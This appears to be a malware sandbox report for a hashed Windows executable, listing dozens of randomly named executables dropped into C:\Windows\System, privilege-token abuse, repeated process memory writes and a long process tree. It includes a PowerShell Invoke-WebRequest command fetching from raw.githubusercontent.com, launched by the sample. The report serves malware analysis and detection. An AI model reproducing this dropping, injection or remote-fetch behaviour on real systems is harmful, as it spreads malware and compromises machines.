File created C:\Windows\System\vpMNZdi.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\vkcuuvY.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1600 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vUqXqTJ.exe
PID 1600 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vUqXqTJ.exe
PID 1600 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vUqXqTJ.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\gwDhgEH.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\gwDhgEH.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\gwDhgEH.exe
PID 1600 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oueWjMz.exe
PID 1600 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oueWjMz.exe
PID 1600 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oueWjMz.exe
PID 1600 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\OBXtOmz.exe
PID 1600 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\OBXtOmz.exe
PID 1600 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\OBXtOmz.exe
PID 1600 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vzkpmHb.exe
PID 1600 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vzkpmHb.exe
PID 1600 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vzkpmHb.exe
PID 1600 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\bVtUqHB.exe
PID 1600 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\bVtUqHB.exe
PID 1600 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\bVtUqHB.exe
PID 1600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BVNhYjx.exe
PID 1600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BVNhYjx.exe
PID 1600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BVNhYjx.exe
PID 1600 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EMAWpwV.exe
PID 1600 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EMAWpwV.exe
PID 1600 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EMAWpwV.exe
PID 1600 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\tcVDcoQ.exe
PID 1600 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\tcVDcoQ.exe
PID 1600 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\tcVDcoQ.exe
PID 1600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EPsJjaV.exe
PID 1600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EPsJjaV.exe
PID 1600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EPsJjaV.exe
PID 1600 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\AMxfcae.exe
PID 1600 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\AMxfcae.exe
PID 1600 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\AMxfcae.exe
PID 1600 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\qdhsgRZ.exe
PID 1600 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\qdhsgRZ.exe
PID 1600 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\qdhsgRZ.exe
PID 1600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vtoJjFe.exe
PID 1600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vtoJjFe.exe
PID 1600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vtoJjFe.exe
PID 1600 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\shQLvWE.exe
PID 1600 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\shQLvWE.exe
PID 1600 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\shQLvWE.exe
PID 1600 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\MqkecDl.exe
PID 1600 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\MqkecDl.exe
PID 1600 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\MqkecDl.exe
PID 1600 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\dnutkiA.exe
PID 1600 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\dnutkiA.exe
PID 1600 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\dnutkiA.exe
PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oeTuQMk.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 1560 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KQQYbkt.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 268 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FqhLzMz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BUeDGoz.exe
PID 1600 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EnBLHui.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\vUqXqTJ.exe

C:\Windows\System\vUqXqTJ.exe

C:\Windows\System\gwDhgEH.exe

C:\Windows\System\gwDhgEH.exe

C:\Windows\System\oueWjMz.exe

C:\Windows\System\oueWjMz.exe

C:\Windows\System\OBXtOmz.exe

C:\Windows\System\OBXtOmz.exe

C:\Windows\System\vzkpmHb.exe

C:\Windows\System\vzkpmHb.exe

C:\Windows\System\bVtUqHB.exe

C:\Windows\System\bVtUqHB.exe

C:\Windows\System\BVNhYjx.exe

C:\Windows\System\BVNhYjx.exe

C:\Windows\System\EMAWpwV.exe

C:\Windows\System\EMAWpwV.exe

C:\Windows\System\tcVDcoQ.exe

C:\Windows\System\tcVDcoQ.exe

C:\Windows\System\EPsJjaV.exe

C:\Windows\System\EPsJjaV.exe

C:\Windows\System\AMxfcae.exe

C:\Windows\System\AMxfcae.exe

C:\Windows\System\qdhsgRZ.exe

C:\Windows\System\qdhsgRZ.exe

C:\Windows\System\vtoJjFe.exe

C:\Windows\System\vtoJjFe.exe

C:\Windows\System\shQLvWE.exe

C:\Windows\System\shQLvWE.exe

C:\Windows\System\MqkecDl.exe

C:\Windows\System\MqkecDl.exe

C:\Windows\System\dnutkiA.exe

C:\Windows\System\dnutkiA.exe

C:\Windows\System\oeTuQMk.exe

C:\Windows\System\oeTuQMk.exe

C:\Windows\System\KQQYbkt.exe

C:\Windows\System\KQQYbkt.exe

C:\Windows\System\FqhLzMz.exe

C:\Windows\System\FqhLzMz.exe

C:\Windows\System\BUeDGoz.exe

C:\Windows\System\BUeDGoz.exe

C:\Windows\System\EnBLHui.exe

C:\Windows\System\EnBLHui.exe

C:\Windows\System\PwOMdqU.exe

C:\Windows\System\PwOMdqU.exe

C:\Windows\System\LIGHBtG.exe

C:\Windows\System\LIGHBtG.exe

C:\Windows\System\BWtVrYg.exe

C:\Windows\System\BWtVrYg.exe

C:\Windows\System\GkOisHl.exe

C:\Windows\System\GkOisHl.exe

C:\Windows\System\GzLIxKC.exe

C:\Windows\System\GzLIxKC.exe

C:\Windows\System\ETcnPOG.exe

C:\Windows\System\ETcnPOG.exe

C:\Windows\System\ufOpfGC.exe

C:\Windows\System\ufOpfGC.exe

C:\Windows\System\NkIPqEY.exe

C:\Windows\System\NkIPqEY.exe

C:\Windows\System\YqCPLyS.exe

C:\Windows\System\YqCPLyS.exe

C:\Windows\System\QKpojNv.exe

C:\Windows\System\QKpojNv.exe

C:\Windows\System\ZQrXklD.exe

C:\Windows\System\ZQrXklD.exe

C:\Windows\System\KrZrbUt.exe

C:\Windows\System\KrZrbUt.exe

C:\Windows\System\QavBcrH.exe

C:\Windows\System\QavBcrH.exe

C:\Windows\System\qHtqYWP.exe

C:\Windows\System\qHtqYWP.exe

C:\Windows\System\pOLtOwR.exe

C:\Windows\System\pOLtOwR.exe

C:\Windows\System\jXklBFl.exe

C:\Windows\System\jXklBFl.exe

C:\Windows\System\vSPtgug.exe

C:\Windows\System\vSPtgug.exe

C:\Windows\System\YcrXTHw.exe

C:\Windows\System\YcrXTHw.exe

C:\Windows\System\hULnGnn.exe

C:\Windows\System\hULnGnn.exe

C:\Windows\System\qyEmSBj.exe

C:\Windows\System\qyEmSBj.exe

C:\Windows\System\cXHBzCL.exe

C:\Windows\System\cXHBzCL.exe

C:\Windows\System\MfOnrNc.exe

C:\Windows\System\MfOnrNc.exe

C:\Windows\System\WQdreIS.exe

C:\Windows\System\WQdreIS.exe

C:\Windows\System\JOGgMqb.exe

C:\Windows\System\JOGgMqb.exe

C:\Windows\System\IgbVKEm.exe

C:\Windows\System\IgbVKEm.exe

C:\Windows\System\gxQVNww.exe

C:\Windows\System\gxQVNww.exe

C:\Windows\System\FyxgfiN.exe

C:\Windows\System\FyxgfiN.exe

C:\Windows\System\cpgYxrD.exe

C:\Windows\System\cpgYxrD.exe

C:\Windows\System\lSXIFUw.exe

C:\Windows\System\lSXIFUw.exe

C:\Windows\System\ExnBwtf.exe

C:\Windows\System\ExnBwtf.exe

C:\Windows\System\mdVpXzR.exe

C:\Windows\System\mdVpXzR.exe

C:\Windows\System\kDBMeFl.exe

C:\Windows\System\kDBMeFl.exe

C:\Windows\System\UAKCPCp.exe

C:\Windows\System\UAKCPCp.exe

C:\Windows\System\GbUbymG.exe

C:\Windows\System\GbUbymG.exe

C:\Windows\System\tKrTalM.exe

C:\Windows\System\tKrTalM.exe

C:\Windows\System\BoThWjO.exe

C:\Windows\System\BoThWjO.exe

C:\Windows\System\yjdfDfo.exe

C:\Windows\System\yjdfDfo.exe

C:\Windows\System\BZQrZqo.exe

C:\Windows\System\BZQrZqo.exe

C:\Windows\System\kTVxCEO.exe

C:\Windows\System\kTVxCEO.exe

C:\Windows\System\zWlXpDM.exe

C:\Windows\System\zWlXpDM.exe

C:\Windows\System\oRnzphC.exe

C:\Windows\System\oRnzphC.exe

C:\Windows\System\GBzpEaR.exe

C:\Windows\System\GBzpEaR.exe

C:\Windows\System\WHCarXp.exe

C:\Windows\System\WHCarXp.exe

C:\Windows\System\AyljZcE.exe

C:\Windows\System\AyljZcE.exe

C:\Windows\System\stmnmOl.exe

C:\Windows\System\stmnmOl.exe

C:\Windows\System\VnZcPhl.exe

C:\Windows\System\VnZcPhl.exe

C:\Windows\System\wWYVXLq.exe

C:\Windows\System\wWYVXLq.exe

C:\Windows\System\OxFGzDR.exe

C:\Windows\System\OxFGzDR.exe

C:\Windows\System\LKuJyck.exe

C:\Windows\System\LKuJyck.exe

C:\Windows\System\CeogdQY.exe

C:\Windows\System\CeogdQY.exe

C:\Windows\System\gPLBCBh.exe

C:\Windows\System\gPLBCBh.exe

C:\Windows\System\NgWuaNJ.exe

C:\Windows\System\NgWuaNJ.exe

C:\Windows\System\JDGsZJl.exe

C:\Windows\System\JDGsZJl.exe

C:\Windows\System\cQTRqEf.exe

C:\Windows\System\cQTRqEf.exe

C:\Windows\System\hgmZgMM.exe

C:\Windows\System\hgmZgMM.exe

C:\Windows\System\zdvihQr.exe

C:\Windows\System\zdvihQr.exe

C:\Windows\System\ynywvic.exe

C:\Windows\System\ynywvic.exe

C:\Windows\System\ePLRcpw.exe

C:\Windows\System\ePLRcpw.exe

C:\Windows\System\fEjqAga.exe

C:\Windows\System\fEjqAga.exe

C:\Windows\System\ZFgrBxq.exe

C:\Windows\System\ZFgrBxq.exe

C:\Windows\System\PAGNTMH.exe

C:\Windows\System\PAGNTMH.exe

C:\Windows\System\uAQisJm.exe

C:\Windows\System\uAQisJm.exe

C:\Windows\System\mIMqjOP.exe

C:\Windows\System\mIMqjOP.exe

C:\Windows\System\rzUPSan.exe

C:\Windows\System\rzUPSan.exe

C:\Windows\System\XyllGOa.exe

C:\Windows\System\XyllGOa.exe

C:\Windows\System\OioXYfh.exe

C:\Windows\System\OioXYfh.exe

C:\Windows\System\OpLLmSX.exe

C:\Windows\System\OpLLmSX.exe

C:\Windows\System\AnmLQDR.exe

C:\Windows\System\AnmLQDR.exe

C:\Windows\System\qzofuAP.exe

C:\Windows\System\qzofuAP.exe

C:\Windows\System\Pbqqovs.exe

C:\Windows\System\Pbqqovs.exe

C:\Windows\System\TkWFuFF.exe

C:\Windows\System\TkWFuFF.exe

C:\Windows\System\nnOYSFE.exe

C:\Windows\System\nnOYSFE.exe

C:\Windows\System\UOoLOJe.exe

C:\Windows\System\UOoLOJe.exe

C:\Windows\System\YUiAFit.exe

C:\Windows\System\YUiAFit.exe

C:\Windows\System\nCuTSMw.exe

C:\Windows\System\nCuTSMw.exe

C:\Windows\System\rNuwQGo.exe

C:\Windows\System\rNuwQGo.exe

C:\Windows\System\FmPbYmC.exe

C:\Windows\System\FmPbYmC.exe

C:\Windows\System\EJXUUlF.exe

C:\Windows\System\EJXUUlF.exe

C:\Windows\System\Dizpssw.exe

C:\Windows\System\Dizpssw.exe

C:\Windows\System\oTbVudC.exe

C:\Windows\System\oTbVudC.exe

C:\Windows\System\OWLZdTX.exe

C:\Windows\System\OWLZdTX.exe

C:\Windows\System\TejjTqd.exe

C:\Windows\System\TejjTqd.exe

C:\Windows\System\KbKjSpj.exe

C:\Windows\System\KbKjSpj.exe

C:\Windows\System\dvWLjbG.exe

C:\Windows\System\dvWLjbG.exe

C:\Windows\System\IprGZFT.exe

C:\Windows\System\IprGZFT.exe

C:\Windows\System\HNOBBCQ.exe

C:\Windows\System\HNOBBCQ.exe

C:\Windows\System\vgXfJOz.exe

C:\Windows\System\vgXfJOz.exe

C:\Windows\System\WaayYnd.exe

C:\Windows\System\WaayYnd.exe

C:\Windows\System\kTChtqE.exe

C:\Windows\System\kTChtqE.exe

C:\Windows\System\nqKkHqI.exe

C:\Windows\System\nqKkHqI.exe

C:\Windows\System\qUvcsAG.exe

C:\Windows\System\qUvcsAG.exe

C:\Windows\System\WrTpsLg.exe

C:\Windows\System\WrTpsLg.exe

C:\Windows\System\gaddApa.exe

C:\Windows\System\gaddApa.exe

C:\Windows\System\WQionoG.exe

C:\Windows\System\WQionoG.exe

C:\Windows\System\MJagdht.exe

C:\Windows\System\MJagdht.exe

C:\Windows\System\DheGZNk.exe

C:\Windows\System\DheGZNk.exe

C:\Windows\System\xeMLFqn.exe

C:\Windows\System\xeMLFqn.exe

C:\Windows\System\EPbBlOX.exe

C:\Windows\System\EPbBlOX.exe

C:\Windows\System\YNcOcQR.exe

C:\Windows\System\YNcOcQR.exe

C:\Windows\System\iTAHplt.exe

C:\Windows\System\iTAHplt.exe

C:\Windows\System\hlshsUY.exe

C:\Windows\System\hlshsUY.exe

C:\Windows\System\frbUOpA.exe

C:\Windows\System\frbUOpA.exe

C:\Windows\System\zhFKgBj.exe

C:\Windows\System\zhFKgBj.exe

C:\Windows\System\KofhTpp.exe

C:\Windows\System\KofhTpp.exe

C:\Windows\System\fyZlPWP.exe

C:\Windows\System\fyZlPWP.exe

C:\Windows\System\KSTgYUz.exe

C:\Windows\System\KSTgYUz.exe

C:\Windows\System\rzPYJVE.exe

C:\Windows\System\rzPYJVE.exe

C:\Windows\System\JvFQMpq.exe

C:\Windows\System\JvFQMpq.exe

C:\Windows\System\WORZALd.exe

C:\Windows\System\WORZALd.exe

C:\Windows\System\dlmvBJw.exe

C:\Windows\System\dlmvBJw.exe

C:\Windows\System\iKnRKYx.exe

C:\Windows\System\iKnRKYx.exe

C:\Windows\System\erqZtKd.exe

C:\Windows\System\erqZtKd.exe

C:\Windows\System\PyNlQxr.exe

C:\Windows\System\PyNlQxr.exe

C:\Windows\System\PtxKJtr.exe

C:\Windows\System\PtxKJtr.exe

C:\Windows\System\LrZxogX.exe

C:\Windows\System\LrZxogX.exe

C:\Windows\System\FzQBGVJ.exe

C:\Windows\System\FzQBGVJ.exe

C:\Windows\System\Bvvcveo.exe

C:\Windows\System\Bvvcveo.exe

C:\Windows\System\SsJVpca.exe

C:\Windows\System\SsJVpca.exe

C:\Windows\System\cmkuKMz.exe

C:\Windows\System\cmkuKMz.exe

C:\Windows\System\edSBwaZ.exe

C:\Windows\System\edSBwaZ.exe

C:\Windows\System\UIRBSNQ.exe

C:\Windows\System\UIRBSNQ.exe

C:\Windows\System\JuYAooX.exe

C:\Windows\System\JuYAooX.exe

C:\Windows\System\qUrJNBu.exe

C:\Windows\System\qUrJNBu.exe

C:\Windows\System\ciWQphT.exe

C:\Windows\System\ciWQphT.exe

C:\Windows\System\fswqnKa.exe

C:\Windows\System\fswqnKa.exe

C:\Windows\System\NXbTqln.exe

C:\Windows\System\NXbTqln.exe

C:\Windows\System\safQGwj.exe

C:\Windows\System\safQGwj.exe

C:\Windows\System\AvHUdVN.exe

C:\Windows\System\AvHUdVN.exe

C:\Windows\System\gSeuCCv.exe

C:\Windows\System\gSeuCCv.exe

C:\Windows\System\KLUvPAo.exe

C:\Windows\System\KLUvPAo.exe

C:\Windows\System\TDsaSCw.exe

C:\Windows\System\TDsaSCw.exe

C:\Windows\System\nzjnWct.exe

C:\Windows\System\nzjnWct.exe

C:\Windows\System\dkNbrze.exe

C:\Windows\System\dkNbrze.exe

C:\Windows\System\cHcuSRg.exe

C:\Windows\System\cHcuSRg.exe

C:\Windows\System\waTUbhM.exe

C:\Windows\System\waTUbhM.exe

C:\Windows\System\MeAqTDi.exe

C:\Windows\System\MeAqTDi.exe

C:\Windows\System\oMzVTYO.exe

C:\Windows\System\oMzVTYO.exe

C:\Windows\System\ochUHIk.exe

C:\Windows\System\ochUHIk.exe

C:\Windows\System\bxIsgdi.exe

C:\Windows\System\bxIsgdi.exe

C:\Windows\System\wpBDwve.exe

C:\Windows\System\wpBDwve.exe

C:\Windows\System\ofJGFsz.exe

C:\Windows\System\ofJGFsz.exe

C:\Windows\System\pKcUkqx.exe

C:\Windows\System\pKcUkqx.exe

C:\Windows\System\eRQclhj.exe

C:\Windows\System\eRQclhj.exe

C:\Windows\System\QbJOpqt.exe

C:\Windows\System\QbJOpqt.exe

C:\Windows\System\TtoIsAl.exe

C:\Windows\System\TtoIsAl.exe

C:\Windows\System\TXsbqmC.exe

C:\Windows\System\TXsbqmC.exe

C:\Windows\System\evIPFZa.exe

C:\Windows\System\evIPFZa.exe

C:\Windows\System\TLhLmWM.exe

C:\Windows\System\TLhLmWM.exe

C:\Windows\System\rDqUvVs.exe

C:\Windows\System\rDqUvVs.exe

C:\Windows\System\NINbtRa.exe

C:\Windows\System\NINbtRa.exe

C:\Windows\System\FWupDXb.exe

C:\Windows\System\FWupDXb.exe

C:\Windows\System\XOJyRhI.exe

C:\Windows\System\XOJyRhI.exe

C:\Windows\System\NVarwbq.exe

C:\Windows\System\NVarwbq.exe

C:\Windows\System\WEyaztX.exe

C:\Windows\System\WEyaztX.exe

C:\Windows\System\ZvVCpsB.exe

C:\Windows\System\ZvVCpsB.exe

C:\Windows\System\cbZtFUx.exe

C:\Windows\System\cbZtFUx.exe

C:\Windows\System\pJHEyZW.exe

C:\Windows\System\pJHEyZW.exe

C:\Windows\System\rqEVfEo.exe

C:\Windows\System\rqEVfEo.exe

C:\Windows\System\CycFBrF.exe

C:\Windows\System\CycFBrF.exe

C:\Windows\System\DzqKczB.exe

C:\Windows\System\DzqKczB.exe

C:\Windows\System\eRUvqKI.exe

C:\Windows\System\eRUvqKI.exe

C:\Windows\System\aIIXWJs.exe

C:\Windows\System\aIIXWJs.exe

C:\Windows\System\eoNFGBj.exe

C:\Windows\System\eoNFGBj.exe

C:\Windows\System\rBSljkP.exe

C:\Windows\System\rBSljkP.exe

C:\Windows\System\TTrbCix.exe

C:\Windows\System\TTrbCix.exe

C:\Windows\System\bCbrVqG.exe

C:\Windows\System\bCbrVqG.exe

C:\Windows\System\TAAqILX.exe

C:\Windows\System\TAAqILX.exe

C:\Windows\System\ULVziRQ.exe

C:\Windows\System\ULVziRQ.exe

C:\Windows\System\ZBhNHXl.exe

C:\Windows\System\ZBhNHXl.exe

C:\Windows\System\SFNnWpV.exe

C:\Windows\System\SFNnWpV.exe

C:\Windows\System\XcbYjZJ.exe

C:\Windows\System\XcbYjZJ.exe

C:\Windows\System\TWDbVLj.exe

C:\Windows\System\TWDbVLj.exe

C:\Windows\System\jHodftH.exe

C:\Windows\System\jHodftH.exe

C:\Windows\System\POMHjXY.exe

